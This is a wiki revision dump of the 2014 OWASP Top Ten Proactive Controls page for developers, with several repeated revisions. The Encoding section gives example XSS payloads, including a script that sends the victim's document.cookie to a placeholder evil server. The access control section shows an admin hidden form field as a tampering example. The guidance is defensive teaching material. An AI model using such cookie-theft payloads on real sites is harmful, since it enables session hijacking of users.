Authorization (Access Control) is the process where requests to access a particular resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused.<br />
<br />
=== Access Control Issues===<br />
<br />
* Many applications used the "All or Nothing" approach - Once authenticated, all users have equal privileges<br />
* Authorization Logic often relies on Security by Obscurity (STO) by assuming:<br />
* Users will not find unlinked or hidden paths or functionality<br />
* Users will not find and tamper with "obscured" client side parameters (i.e. "hidden" form fields, cookies, etc.)<br />
* Applications with multiple permission levels/roles often increases the possibility of conflicting permission sets resulting in unanticipated privileges<br />
* Many administrative interfaces require only a password for authentication<br />
* Shared accounts combined with a lack of auditing and logging make it extremely difficult to differentiate between malicious and honest administrators<br />
* Administrative interfaces are often not designed as “secure” as user-level interfaces given the assumption that administrators are trusted users<br />
* Authorization/Access Control relies on client-side information (e.g., hidden fields)<br />
* Web and application server processes run as root, Administrator, LOCALSYSTEM or other privileged accounts<br />
* Some web applications access the database via sa or other administrative account (or more privileges than required)<br />
* Some applications implement authorization controls by including a file or web control or code snippet on every page in the application<br />
<input type="text" name="fname" value="Derek"><br />
<input type="text" name="lname" value="Jeter"><br />
<input type="hidden" name="usertype" value="admin"><br />
<br />
=== Access Control Anti-Patterns ===<br />
<br />
* Hard-coded role checks in application code<br />
* Lack of centralized access control logic<br />
* Untrusted data driving access control decisions<br />
* Access control that is "open by default"<br />
* Lack of addressing horizontal access control in a standardized way (if at all)<br />
* Access control logic that needs to be manually added to every endpoint in code<br />
* non-anonymous entry point DO NOT have an access control check<br />
* No authorization check at or near the beginning of code implementing sensitive activities<br />
<br />
For more information on access control, please see the [[Access Control Cheat Sheet]].<br />
<br />
== 5) Identity and Authentication ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
For more information, please see the [[Authentication Cheat Sheet]], the [[Password Storage Cheat Sheet]], the [[Forgot Password Cheat Sheet]] and the [[Session Management Cheat Sheet]].<br />
<br />
== 6) Data Protection and Privacy ==<br />
<br />
=== Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
For more information on proper SSL/TLS configuration, please see the [[Transport Layer Protection Cheat Sheet]]. For information on protecting your users from man in the middle attacks via fraudulent SSL certificates, please see the [[Pinning Cheat Sheet]].<br />
<br />
=== Encryption at Rest TODO JMANICO===<br />
<br />
#1 forced to encrypt data via standards like PCI<br />
#2 doing low level crypto by hand leads to bad crypto<br />
#3 user well vetted libraries like KeyCzar<br />
#4 key management a bear<br />
#5 tiering and trust - crypto services vs embedding crypto at the app layer<br />
#6 symmetric/asymmetric encryption<br />
#7 weirdness of password strorage crypto (punt to the CS)<br />
#8 digital signatures<br />
#9 it's also important to ensure sensitive data is not cached in the browser. cache-control settings?<br />
#10 For more information on low level decisions necessary when encrypting data at rest, please see the [[Cryptographic Storage Cheat Sheet]].<br />
<br />
=== Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
== 7) Logging, Error Handling and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
The AppSensor project defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. For more information please see the [[OWASP AppSensor Project]].<br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection or Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
For more information on how to properly implement logging in an application, please see the [[Logging Cheat Sheet]].<br />
<br />
== 8) Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* Spring Security : [http://static.springsource.org/spring-security/site/index.html]<br />
* Apache Shiro : [http://shiro.apache.org/ http://shiro.apache.org/]<br />
* OWASP ESAPI : [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
== 9) Security in Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project. These include:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use-cases which include input, behavior and output, and can be tested for functional correctness by Q/A staff. Functional requirements like re-authentication during change password or a forgot password feature can be reviewed and tested by Q/A staff. <br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features are often multi-step multi-branch workflows that are difficult to evaluate thoroughly, for example eCommerce workflows, shipping route choices, or banking transfer validation. The stories or use cases for these requirements should include failure scenarios (what happens if a step fails or times out or if someone accidentally repeats a step?) and requirements derived from "abuse-cases". Abuse cases describe how the application's functions could be subverted by attackers. Thinking about failures and attack scenarios will uncover weaknesses that need to be addressed to improve the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must be aware of what personal and confidential information needs to be protected and tracked. This will drive the need for access control, encryption and auditing and logging controls in the system.<br />
<br />
== 10) Security in Architecture and Design ==<br />
<br />
Security needs to be considered in the architecture and design of the application.<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team needs to understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls should be enforced in the client, the web layer, the business layer, the data layer, and where you need to establish trust between different systems or different parts of the same system. Understand these trust boundaries: what is inside or outside of a trust boundary, what actors or data can be trusted, what should not be? This determines where you need to make decisions about authentication, access control, data validation and encoding, encryption and logging.<br />
<br />
3) '''Understand the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (whether you should do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
For more information, see the [[Attack Surface Analysis Cheat Sheet]].<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! This project is the comprehensive reference for all OWASP projects and application security in general. All of the materials here are free and open source. <br />
<br />
== Status ==<br />
<br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
= Who are we? =<br />
<br />
Jim Manico jim@owasp.org<br/><br />
Andrew Van Der Stock vanderaj@owasp.org<br/><br />
Stephen de Vries stephen@continuumsecurity.net<br/><br />
Jim Bird jimbird@shaw.ca<br/><br />
<br />
= About =<br />
{{:Projects/OWASP_Proactive_Controls}} <br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=169952OWASP Proactive Controls2014-03-11T20:03:26Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
<center>[[Image:Proactive.png|500px|frameless|architecture]]</center><br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
==Licensing==<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is this? ==<br />
<br />
The OWASP Proactive Controls<br />
<br />
* This document was written by developers for developers, to assist those new to secure development.<br />
<br />
== Email List ==<br />
<br />
[https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List ]<br />
<br />
== Project Leader ==<br />
<br />
Project Leaders:<br/>Jim Manico<br/><br />
Andrew Van Der Stock<br/><br />
Jim Bird<br/><br />
<br/><br />
Contributors: <br/><br />
Stephen de Vries<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== News and Events ==<br />
* [Feb 4 2014] New Wiki Template!<br />
<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [https://creativecommons.org/licenses/by-sa/3.0/us/ CC BY-SA 3.0 US]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would like to especially thank Andrew van der Stock for starting this project. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten and one half Proactive Controls 2014. <br />
<br />
== 1) Query Parameterization ==<br />
<br />
SQL Injection is perhaps one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of query parameterization Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
For more information, please see the [[Query Parameterization Cheat Sheet]].<br />
<br />
== 2) Encoding ==<br />
<br />
A key component of a web application is the user interface. Web developers often build web pages dynamically, consisting of database data that was originally populated with user input. This input should often be considered to be untrusted data and dangerous, which requires special handling when building a secure web application.<br />
<br />
Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in users browsers and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. <br />
<br />
Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding/escaping is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML.<br />
<br />
For more information on stopping XSS in your web application, please visit the OWASP Cross Site Scripting Prevention Cheat Sheet. https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet<br />
<br />
== 3) Validation ==<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types on input validation: “White list validation and blacklist validation”. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively and is not often suggested when initially building a secure web application. The following examples will focus on whitelist validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Also, it's critical to treat all client side data as untrusted. (we need to expand on this)<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation whitelist of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
== 4) Access Control TODO JMANICO ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused.<br />
<br />
=== Access Control Issues===<br />
<br />
* Many applications used the "All or Nothing" approach - Once authenticated, all users have equal privileges<br />
* Authorization Logic often relies on Security by Obscurity (STO) by assuming:<br />
* Users will not find unlinked or hidden paths or functionality<br />
* Users will not find and tamper with "obscured" client side parameters (i.e. "hidden" form fields, cookies, etc.)<br />
* Applications with multiple permission levels/roles often increases the possibility of conflicting permission sets resulting in unanticipated privileges<br />
* Many administrative interfaces require only a password for authentication<br />
* Shared accounts combined with a lack of auditing and logging make it extremely difficult to differentiate between malicious and honest administrators<br />
* Administrative interfaces are often not designed as “secure” as user-level interfaces given the assumption that administrators are trusted users<br />
* Authorization/Access Control relies on client-side information (e.g., hidden fields)<br />
* Web and application server processes run as root, Administrator, LOCALSYSTEM or other privileged accounts<br />
* Some web applications access the database via sa or other administrative account (or more privileges than required)<br />
* Some applications implement authorization controls by including a file or web control or code snippet on every page in the application<br />
<input type="text" name="fname" value="Derek"><br />
<input type="text" name="lname" value="Jeter"><br />
<input type="hidden" name="usertype" value="admin"><br />
<br />
=== Access Control Anti-Patterns ===<br />
<br />
* Hard-coded role checks in application code<br />
* Lack of centralized access control logic<br />
* Untrusted data driving access control decisions<br />
* Access control that is "open by default"<br />
* Lack of addressing horizontal access control in a standardized way (if at all)<br />
* Access control logic that needs to be manually added to every endpoint in code<br />
* non-anonymous entry point DO NOT have an access control check<br />
* No authorization check at or near the beginning of code implementing sensitive activities<br />
<br />
For more information on access control, please see the [[Access Control Cheat Sheet]].<br />
<br />
== 5) Identity and Authentication ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
For more information, please see the [[Authentication Cheat Sheet]], the [[Password Storage Cheat Sheet]], the [[Forgot Password Cheat Sheet]] and the [[Session Management Cheat Sheet]].<br />
<br />
== 6) Data Protection and Privacy ==<br />
<br />
=== Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
For more information on proper SSL/TLS configuration, please see the [[Transport Layer Protection Cheat Sheet]]. For information on protecting your users from man in the middle attacks via fraudulent SSL certificates, please see the [[Pinning Cheat Sheet]].<br />
<br />
=== Encryption at Rest TODO JMANICO===<br />
<br />
#1 forced to encrypt data via standards like PCI<br />
#2 doing low level crypto by hand leads to bad crypto<br />
#3 user well vetted libraries like KeyCzar<br />
#4 key management a bear<br />
#5 tiering and trust - crypto services vs embedding crypto at the app layer<br />
#6 symmetric/asymmetric encryption<br />
#7 weirdness of password strorage crypto (punt to the CS)<br />
#8 digital signatures<br />
#9 it's also important to ensure sensitive data is not cached in the browser. cache-control settings?<br />
#10 For more information on low level decisions necessary when encrypting data at rest, please see the [[Cryptographic Storage Cheat Sheet]].<br />
<br />
=== Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
== 7) Logging, Error Handling and Intrusion Detection TODO JIMBIRD ==<br />
<br />
Application logging should not be an afterthought. Logging is not just important in debugging and troubleshooting. Logging also drives<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
The AppSensor project defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. For more information please see the [[OWASP AppSensor Project]].<br />
<br />
Application logging should be always be included for security events. Application logs are invaluable data for:<br />
<br />
* Identifying security incidents<br />
* Monitoring policy violations<br />
* Establishing baselines<br />
* Providing information about problems and unusual conditions<br />
* Contributing additional application-specific data for incident investigation which is lacking in other log sources<br />
* Helping defend against vulnerability identification and exploitation through attack detection<br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCIDSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect the system from Log Injection, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
For more information on how to properly implement logging in an application, please see the [[Logging Cheat Sheet]].<br />
<br />
== 8) Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* Spring Security : [http://static.springsource.org/spring-security/site/index.html]<br />
* Apache Shiro : [http://shiro.apache.org/ http://shiro.apache.org/]<br />
* OWASP ESAPI : [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
== 9) Security in Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project. These include:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use-cases which include input, behavior and output, and can be tested for functional correctness by Q/A staff. Functional requirements like re-authentication during change password or a forgot password feature can be reviewed and tested by Q/A staff. <br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features are often multi-step multi-branch workflows that are difficult to evaluate thoroughly, for example eCommerce workflows, shipping route choices, or banking transfer validation. The stories or use cases for these requirements should include failure scenarios (what happens if a step fails or times out or if someone accidentally repeats a step?) and requirements derived from "abuse-cases". Abuse cases describe how the application's functions could be subverted by attackers. Thinking about failures and attack scenarios will uncover weaknesses that need to be addressed to improve the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must be aware of what personal and confidential information needs to be protected and tracked. This will drive the need for access control, encryption and auditing and logging controls in the system.<br />
<br />
== 10) Security in Architecture and Design ==<br />
<br />
Security needs to be considered in the architecture and design of the application.<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team needs to understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls should be enforced in the client, the web layer, the business layer, the data layer, and where you need to establish trust between different systems or different parts of the same system. Understand these trust boundaries: what is inside or outside of a trust boundary, what actors or data can be trusted, what should not be? This determines where you need to make decisions about authentication, access control, data validation and encoding, encryption and logging.<br />
<br />
3) '''Understand the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (whether you should do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
For more information, see the [[Attack Surface Analysis Cheat Sheet]].<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! This project is the comprehensive reference for all OWASP projects and application security in general. All of the materials here are free and open source. <br />
<br />
== Status ==<br />
<br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
= Who are we? =<br />
<br />
Jim Manico jim@owasp.org<br/><br />
Andrew Van Der Stock vanderaj@owasp.org<br/><br />
Stephen de Vries stephen@continuumsecurity.net<br/><br />
Jim Bird jimbird@shaw.ca<br/><br />
<br />
= About =<br />
{{:Projects/OWASP_Proactive_Controls}} <br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=169951OWASP Proactive Controls2014-03-11T19:53:29Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
<center>[[Image:Proactive.png|500px|frameless|architecture]]</center><br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
==Licensing==<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is this? ==<br />
<br />
The OWASP Proactive Controls<br />
<br />
* This document was written by developers for developers, to assist those new to secure development.<br />
<br />
== Email List ==<br />
<br />
[https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List ]<br />
<br />
== Project Leader ==<br />
<br />
Project Leaders:<br/>Jim Manico<br/><br />
Andrew Van Der Stock<br/><br />
Jim Bird<br/><br />
<br/><br />
Contributors: <br/><br />
Stephen de Vries<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== News and Events ==<br />
* [Feb 4 2014] New Wiki Template!<br />
<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [https://creativecommons.org/licenses/by-sa/3.0/us/ CC BY-SA 3.0 US]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would like to especially thank Andrew van der Stock for starting this project. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten and one half Proactive Controls 2014. <br />
<br />
== 1) Query Parameterization ==<br />
<br />
SQL Injection is perhaps one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
